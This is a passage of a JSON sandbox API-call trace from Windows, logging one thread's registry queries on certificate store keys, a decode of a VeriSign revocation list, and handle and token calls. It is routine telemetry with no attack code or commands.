"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xa3w\\xd1\\xb1\\xc0S\\x883\\x03R\\x11\\xf4\\x08=\\x00\\xfe\\xccAM\\xab!\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb5\\x01\\x00\\x000\\x82\\x01\\xb10\\x82\\x01\\x1a\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000a1\\x110\\x0f\\x06\\x03U\\x04\\x07\\x13\\x08Internet1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign Commercial Software Publishers CA\\x17\r010324000000Z\\x17\r040107235959Z0i0!\\x02\\x10\\x1bQ\\x90\\xf77$9\\x9c\\x92T\\xcdBF7\\x99j\\x17\r010130000124Z0!\\x02\\x10u\\x0e@\\xff\\x97\\xf0G\\xed\\xf5V\\xc7\\x08N\\xb1\\xab\\xfd\\x17\r010131000049Z0!\\x02\\x10w\\xe6ZCY\\x93]_zu\\x80\\x1a\\xcd\\xad\\xc2\"\\x17\r000831000056Z\\xa0\\x1a0\\x180\t\\x06\\x03U\\x1d\\x13\\x04\\x020\\x000\\x0b\\x06\\x03U\\x1d\\x0f\\x04\\x04\\x03\\x02\\x05\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x00\\x03\\x81\\x81\\x00\\x18,\\xe8\\xfc\\x16m\\x91J=\\x88TH]\\xb8\\x11\\xbfd\\xbb\\xf9\\xdaY\\x19\\xdd\\x0ee\\xab\\xc0\\x0c\\xfag~!\\x1e\\x83\\x0e\\xcf\\x9b\\x89\\x8a\\xcf\\x0cK\\xc19\\x9d\\xe7j\\xacFtj\\x91b\"\r\\xc4\\x08\\xbd\\xf5\n\\x90\\x7f\\x06!=~\\xa7\\xaa^\\xcd\"\\x15\\xe6\\x0cu\\x8en\\xad\\xf1\\x84\\xe4\"\\xb40o\\xfbd\\x8f\\xd7\\x80C\\xf5\\x19\\x18f\\x1dr\\xa3\\xe3\\x94\\x82(R\\xa0\\x06N\\xb1\\xc8\\x92\\x0c\\x97\\xbe\\x15\\x07\\xabz\\xc9\\xea\\x08gCMQc;\\x9c\\x9c\\xcd" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob" + } + ], + "repeated": 0, + "id": 1190 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1191 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\\xb10\\x82\\x01\\x1a\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000a1\\x110\\x0f\\x06\\x03U\\x04\\x07\\x13\\x08Internet1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign Commercial Software Publishers CA\\x17\r010324000000Z\\x17\r040107235959Z0i0!\\x02\\x10\\x1bQ\\x90\\xf77$9\\x9c\\x92T\\xcdBF7\\x99j\\x17\r010130000124Z0!\\x02\\x10u\\x0e@\\xff\\x97\\xf0G\\xed\\xf5V\\xc7\\x08N\\xb1\\xab\\xfd\\x17\r010131000049Z0!\\x02\\x10w\\xe6ZCY\\x93]_zu\\x80\\x1a\\xcd\\xad\\xc2\"\\x17\r0008310" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1192 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1193 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000050c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1194 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1195 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1196 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1197 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1198 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1199 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1200 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1201 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1202 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1203 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1204 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1205 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1206 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1207 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1208 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1209 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1210 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1211 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1212 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1213 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1214 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1215 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1216 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\" + } + ], + "repeated": 0, + "id": 1217 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1218 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1219 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1220 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1221 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1222 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000524" + } + ], + "repeated": 0, + "id": 1223 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1224 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1225 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1226 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1227 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1228 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1229 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1230 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1231 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1232 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1233 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1234 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1235 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1236 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1237 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1238 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + 